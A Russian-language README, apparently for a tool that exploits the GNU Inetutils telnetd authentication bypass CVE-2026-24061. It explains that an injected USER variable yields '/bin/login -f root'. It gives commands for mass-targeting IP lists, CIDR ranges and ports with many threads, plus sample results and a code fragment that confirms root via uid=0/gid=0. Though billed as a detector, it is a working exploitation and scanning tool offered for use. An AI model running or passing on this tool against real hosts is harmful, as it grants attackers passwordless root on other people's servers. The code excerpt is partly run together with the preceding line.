
GNU Inetutils telnet — уязвимость удалённого обхода аутентификации (CVE-2026-24061). Уязвимость вызвана некорректной обработкой переменных окружения в компоненте telnetd из GNU Inetutils. Злоумышленник может воспользоваться этой уязвимостью, отправив специально сформированную переменную окружения USER на уязвимый telnet-сервис, что запускает механизм обхода аутентификации и позволяет получить root-права без ввода пароля.
Это продвинутый инструмент для обнаружения уязвимости обхода аутентификации GNU Inetutils Telnetd (CVE-2026-24061). Уязвимость имеет оценку CVSS 9.8, и злоумышленник может получить root-доступ без аутентификации путем внедрения переменных окружения.
# Поддержка цветов в Windows
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# Создание файла с целями
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# Выполнение массового сканирования
python3 CVE-2026-24061.py -f targets.txt
# Указание порта и количества потоков
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# Подробный режим и сохранение результатов
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# Настраиваемое время ожидания
python3 CVE-2026-24061.py -f targets.txt -T 10
| Статус | Обозначение | Цвет | Описание |
|---|---|---|---|
| Подтвержденная уязвимость | ✓ | 🔴 Красный | Обнаружены и uid=0, и gid=0 |
| Высокая степень подозрения | ⚠ | 🟡 Желтый | Обнаружены uid=0 и пользователь root |
| Требуется подтверждение | ? | 🔵 Голубой | Обнаружен только uid=0, требуется ручная проверка |
| Безопасно | ✗ | 🟢 Зеленый | Признаки уязвимости не обнаружены |
| Ошибка подключения | ✗ | ⚪ Серый | Проблемы с сетевым подключением |
[✓ Подтвержденная уязвимость] [14:30:25] 192.168.1.1:23 └─ Подтвержденная уязвимость | uid=0/gid=0 | Баннер: Ubuntu 20.04
[⚠ Высокая степень подозрения] [14:30:26] 192.168.1.2:23 └─ Высокая степень подозрения | uid=0 + root | Баннер: Debian 12
[? Требуется подтверждение] [14:30:27] 192.168.1.3:23 └─ Обнаружен uid=0, но отсутствуют другие условия подтверждения
| Параметр | Сокращение | Значение по умолчанию | Описание |
|---|---|---|---|
--file | -f | - | Путь к файлу с целями |
--port | -p | 23 | Целевой порт |
--threads | -t | 50 | Количество одновременных потоков |
--timeout | -T | 8 | Время ожидания для одной цели (секунды) |
--output | -o | - | Файл для вывода результатов |
--verbose | -v | False | Подробный режим вывода |
--user | -u | root | Имя пользователя для аутентификации |
Файл с целями поддерживает следующие форматы: 192.168.1.1 192.168.1.2:2323 # указанный порт 192.168.1.0/24 # формат CIDR 10.0.0.1-10.0.0.10 # диапазон IP-адресов
Данная уязвимость использует недостаток обработки переменных окружения в GNU Inetutils Telnetd:
/bin/login -f root# Множественные условия проверки
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# Логика подтверждения уязвимости
if uid_0_detected and gid_0_detected:
return "Подтвержденная уязвимость"
elif uid_0_detected and root_detected:
return "Высокая степень подозрения"
elif uid_0_detected:
return "Требуется подтверждение"
·


